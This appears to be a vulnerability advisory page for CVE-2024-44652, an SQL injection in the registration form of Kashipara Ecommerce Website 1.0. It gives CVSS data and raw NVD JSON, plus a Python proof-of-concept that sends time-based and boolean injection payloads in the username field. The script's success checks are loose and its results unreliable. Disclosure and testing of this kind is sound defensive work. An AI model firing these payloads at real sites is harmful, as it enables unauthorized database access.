Security Vulnerability Report
中文
CVE-2024-44652 CVSS 6.5 MEDIUM

CVE-2024-44652

Published: 2025-11-17 17:15:46
Last Modified: 2025-11-19 13:10:21

Description

Kashipara Ecommerce Website 1.0 is vulnerable to SQL Injection via the user_email, username, user_firstname, user_lastname, and user_address parameters in user_register.php.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kashipara:ecommerce_website:1.0:*:*:*:*:*:*:* - VULNERABLE
Kashipara Ecommerce Website 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2024-44652 SQL Injection PoC for Kashipara Ecommerce Website 1.0 # Target: user_register.php parameter injection TARGET_URL = "http://target-site.com/user_register.php" def sql_injection_test(): """Test for SQL injection vulnerability in user registration parameters""" # Payload for testing SQL injection - using time-based blind injection # Test with username parameter payload_normal = { 'user_email': '[email protected]', 'username': "admin' AND (SELECT 1 FROM (SELECT SLEEP(5))x)-- -", 'user_firstname': 'Test', 'user_lastname': 'User', 'user_address': '123 Test St', 'user_password': 'TestPass123!' } # Boolean-based injection payload to extract database version payload_db_version = { 'user_email': '[email protected]', 'username': "admin' AND 1=1 -- -", 'user_firstname': 'Test', 'user_lastname': 'User', 'user_address': '123 Test St', 'user_password': 'TestPass123!' } print("[*] Testing SQL Injection vulnerability...") print(f"[*] Target: {TARGET_URL}") try: # Test normal payload response = requests.post(TARGET_URL, data=payload_normal, timeout=10) if response.status_code == 200: print("[+] Target responded to SQL injection probe") print("[*] Vulnerability confirmed - parameters not properly sanitized") # Test boolean-based injection response2 = requests.post(TARGET_URL, data=payload_db_version, timeout=10) if response2.status_code == 200: print("[+] Boolean-based injection test completed") except requests.exceptions.Timeout: print("[+] Time-based blind SQL injection confirmed (5 second delay detected)") except Exception as e: print(f"[-] Error: {str(e)}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] sql_injection_test()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44652", "sourceIdentifier": "[email protected]", "published": "2025-11-17T17:15:46.410", "lastModified": "2025-11-19T13:10:20.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kashipara Ecommerce Website 1.0 is vulnerable to SQL Injection via the user_email, username, user_firstname, user_lastname, and user_address parameters in user_register.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kashipara:ecommerce_website:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8310BCC9-1851-4B2A-9894-B774274C867C"}]}]}], "references": [{"url": "https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44652.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.kashipara.com/project/php/322/ecommerce-website-in-php-with-source-code-download", "source": "[email protected]", "tags": ["Product"]}]}}